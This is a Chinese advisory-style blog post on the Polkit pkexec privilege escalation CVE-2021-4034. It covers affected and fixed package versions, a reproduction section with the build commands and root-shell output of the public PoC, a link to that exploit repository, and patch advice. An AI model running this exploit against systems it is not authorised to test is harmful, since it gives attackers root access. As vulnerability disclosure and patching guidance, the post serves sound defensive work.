Linux Polkit本地权限提升漏洞(CVE-2021-4034)

漏洞描述

Polkit是用于在Linux操作系统中控制系统范围特权的组件。它为非特权进程提供了与特权进程进行通信的有组织的方式。类似“sudo”的用法。

CVE-2021-4034

polkit的pkexec存在本地权限提升漏洞,已获得普通权限的攻击者可通过此漏洞获取root权限。

该漏洞CVSS评分:7.8,

危害等级:高危漏洞利用难度低,最早引入问题的commit来自2009年,影响版本范围远超去年的sudo漏洞。漏洞作者在Ubuntu、Debian、Fedora和CentOS的默认安装环境上均测试通过。

影响范围

影响版本:由于polkit为系统预装工具,目前主流Linux版本均受影响。

修复版本:

CentOS系列:

CentOS 6:polkit-0.96-11.el6_10.2

CentOS 7:polkit-0.112-26.el7_9.1

CentOS 8.0:polkit-0.115-13.el8_5.1

CentOS 8.2:polkit-0.115-11.el8_2.2

CentOS 8.4:polkit-0.115-11.el8_4.2

Ubuntu系列:

Ubuntu 20.04 LTS:policykit-1 - 0.105-26ubuntu1.2

Ubuntu 18.04 LTS:policykit-1 - 0.105-20ubuntu0.18.04.6

Ubuntu 16.04 ESM:policykit-1 - 0.10514.1ubuntu0.5+esm1

Ubuntu 14.04 ESM:policykit-1 - 0.105-4ubuntu3.14.04.6+esm1

漏洞复现

下载poc,进入poc目录,编译,运行。

vagrant@ubuntu-impish:~/CVE-2021-4034$ make

cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c

cc -Wall cve-2021-4034.c -o cve-2021-4034

echo “module UTF-8// PWNKIT// pwnkit 1” > gconv-modules

mkdir -p GCONV_PATH=.

cp /usr/bin/true GCONV_PATH=./pwnkit.so:.

vagrant@ubuntu-impish:~/CVE-2021-4034$ ./cve-2021-4034

whoami
root
exit

实战

poc地址

https://github.com/berdav/CVE-2021-4034

修复建议

参考漏洞影响范围,及时升级至最新安全版本。
总结和参考

1、及时安装安全软件,关闭不需要的服务和端口。

2、开启系统防火墙。

3、及时升级系统或者软件的版本。

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值